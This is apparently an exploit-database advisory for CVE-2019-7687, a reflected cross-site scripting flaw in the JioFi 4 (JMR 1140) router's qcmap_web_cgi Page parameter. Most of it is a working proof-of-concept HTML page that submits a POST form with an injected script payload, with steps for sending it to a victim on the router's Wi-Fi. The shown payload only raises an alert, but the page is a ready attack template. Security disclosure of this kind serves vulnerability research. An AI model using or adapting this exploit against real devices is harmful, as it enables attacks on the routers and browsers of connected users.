# Exploit Title: Jiofi 4 (JMR 1140) Reflected Cross Site Scripting
# Date: 12.02.2019
# Exploit Author: Ronnie T Baby
# Contact:https://www.linkedin.com/in/ronnietbaby
# Vendor Homepage: www.jio.com
# Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574
# Category: Hardware (Wifi Router)
# Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07
# Tested on: Ubuntu 18.04
# CVE: CVE-2019-7687
Description:
cgi-bin/qcmap_web_cgi on JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices has POST based reflected XSS via the Page parameter. No sanitization is performed for user input data.
1. Create a poc.html and insert
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
<input type="hidden" name="Page" value="GetDeviceDetailsyfc7b<script>alert(document.domain)</script>pyk0j" />
<input type="hidden" name="mask" value="0" />
<input type="hidden" name="token" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>d
</html>
2. Send to victim(who is connected to the wifi network).
3. Post based Xss gets fired .
Exploit working in firefox quantum ,firefox dev edition etc. Chrome XSS auditor blocks this POC.